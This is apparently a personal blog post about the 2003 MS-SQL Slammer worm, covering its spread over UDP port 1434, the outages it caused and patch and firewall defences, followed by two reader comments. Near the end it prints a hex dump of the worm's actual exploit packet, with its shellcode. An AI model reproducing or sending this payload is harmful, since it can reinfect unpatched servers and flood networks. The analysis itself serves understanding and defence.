Press "Enter" to skip to content

Techy: MS-SQL Slammer

[MS-SQL Slammer Worm]As you may have already heard, over the weekend the Internet was hit by one of the fastest spreading worms since the original Morris worm. The name of this nasty piece of code? “MS-SQL Slammer”- so called because it uses a 6-month old exploit in unpatched Microsoft SQL servers as its method of spreading- but spreads so quickly that it caused major problems across the ‘net.

Actually, to call it a nasty piece of work is doing a disservice to the author (who is, at this moment of time, still unknown). It’s a lovely piece of optimised assembly code which does “it’s job” in just 376 bytes in length (to put that in perspective – that is exactly the length, in letters, spaces and punctuation, of the first paragraph of this entry).

When the code infects an unpatched Microsoft SQL Server 2000 or Microsoft Desktop Engine (MSDE – which is included in Visual Studio.net, Asp.net Web Matrix Tool, Office XP Developer Edition, MSDN Universal and Enterprise, Microsoft Access and Microsoft Applicaiton 2000), it first loads the “modules” Kernel32.dll and WS2_32.dll. It then calls the routine “GetTickCount” to generate random IP (internet protocol) address which it then targets for propagation and exploitation over the UDP (User Datagram Protocol) protocol port 1434. It repeats the exploit code (using a method called a stack buffer overflow) until either the SQL server is shut down or the machine is rebooted.

Whilst it does no damage to any files and is only “memory resident” (once you reboot the worm is gone), it can consume enormous amounts of bandwidth – so much, in fact, that it caused 5 of the main 13 root DNS name servers to go down. These machines aren’t, in fact, running MS-SQL server (and hence cannot be infected by this worm) but they (or the routers attached to them) simply couldn’t cope with the extremely large amount of traffic that was suddenly being sent to them. If it was a gradual increase over a number of months (as, typically, the internet normally grows) then the servers could have been upgraded – but this was like driving down a 6 lane motorway then suddenly is reduced to a single lane. The Bank Of America suffered problems to over 13,000 ATMs (Automatic Teller Machines) because of technical problems caused by the worm. Dshield.org registered 15,510,276 reports of attacks by the worm within a 24 hour period on the 25th – making it responsible for around 80.48% of all server attacks that day.

MS-SQL Slammer – also known as w2.SQLSlammer.worm, Sapphire, w32.SQLexp.worm and Helkern -which initially appeared around 05:30am UTC/GMT on Saturday (25th January) is reckoned to have infected around a quarter of a million computers worldwide and, whilst many ISPs (Internet Service Providers) have now put filters in place to stop the worm, it is still causing scattered slowdowns in internet traffic.

The worm could be prevented by a number of simple ways – one would be ensuring that the system administrator of the SQL server does his/her/their job by ensuring it is up to date with the relevant patches from Microsoft (or installing the SQL 2000 Service Pack 3) – these security hole was patched back in July 2002!

The other simple way is just a good firewall strategy: many people think you should “accept all, block set ports”, but if you were to go for the “block all, accept set ports” method and only opened up the computer “ports” to the internet you actually needed up (for example, port 80 for web traffic, 21+22 for FTP, 25+110 for email and 22 or 23 for Telnet or SSH) then you would have been already protected against the worm.

Yes, it is possible to blame Microsoft writing faulty code which had this exploitable hole in it – but in all fairness they did release a patch in a timely manner (a week or so after it was initially reported to them) and alerted people that asked for that sort of alert (they do have an email notification list) – plus the fact that “standard firewall protection methods” should have blocked the worm means that main people to blame for this worm being able to spread so freely about the internet is the systems administrators. If you find out that your site was responsible for some of the spread, then I would suggest a review of your IT personnel…

Here’s the actual code from the worm:

000: 0003 ba0b e48d 0050 7343 a257 0800 4500 .......PsC.W..E.
016: 0194 00f2 0000 6d11 d101 da39 813a c331 ......m....9.:.1
032: 42d1 10c8 059a 0180 aa1d 0401 0101 0101 B...............
048: 0101 0101 0101 0101 0101 0101 0101 0101 ................
064: 0101 0101 0101 0101 0101 0101 0101 0101 ................
080: 0101 0101 0101 0101 0101 0101 0101 0101 ................
096: 0101 0101 0101 0101 0101 0101 0101 0101 ................
112: 0101 0101 0101 0101 0101 0101 0101 0101 ................
128: 0101 0101 0101 0101 0101 01dc c9b0 42eb ..............B.
144: 0e01 0101 0101 0101 70ae 4201 70ae 4290 ........p.B.p.B.
160: 9090 9090 9090 9068 dcc9 b042 b801 0101 .......h...B....
176: 0131 c9b1 1850 e2fd 3501 0101 0550 89e5 .1...P.5....P..
192: 5168 2e64 6c6c 6865 6c33 3268 6b65 726e Qh.dllhel32hkern
208: 5168 6f75 6e74 6869 636b 4368 4765 7454 QhounthickChGetT
224: 66b9 6c6c 5168 3332 2e64 6877 7332 5f66 f.llQh32.dhws2_f
240: b965 7451 6873 6f63 6b66 b974 6f51 6873 .etQhsockf.toQhs
256: 656e 64be 1810 ae42 8d45 d450 ff16 508d end....B.E.P..P.
272: 45e0 508d 45f0 50ff 1650 be10 10ae 428b E.P.E.P..P....B.
288: 1e8b 033d 558b ec51 7405 be1c 10ae 42ff ...=U..Qt.....B.
304: 16ff d031 c951 5150 81f1 0301 049b 81f1 ...1.QQP........
320: 0101 0101 518d 45cc 508b 45c0 50ff 166a ....Q.E.P.E.P..j
336: 116a 026a 02ff d050 8d45 c450 8b45 c050 .j.j...P.E.P.E.P
352: ff16 89c6 09db 81f3 3c61 d9ff 8b45 b48d ........

The only "important" details are those in the far right column - the rest is just hexadecimal "memory dump" of the worm.

2 Comments

  1. Fascinating.

    I heard some rumbling that it could have a phase 2 to trigger at a later date on already-infected machines, but based on your comments, rebooting cleared it.

    Any word if there’s any truth to that one? I want to be ready to snicker again when it happens.

  2. Nope, there’s no time sensitive code in it. However, unless the servers are patched it’ll be easy for it to start spreading again.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.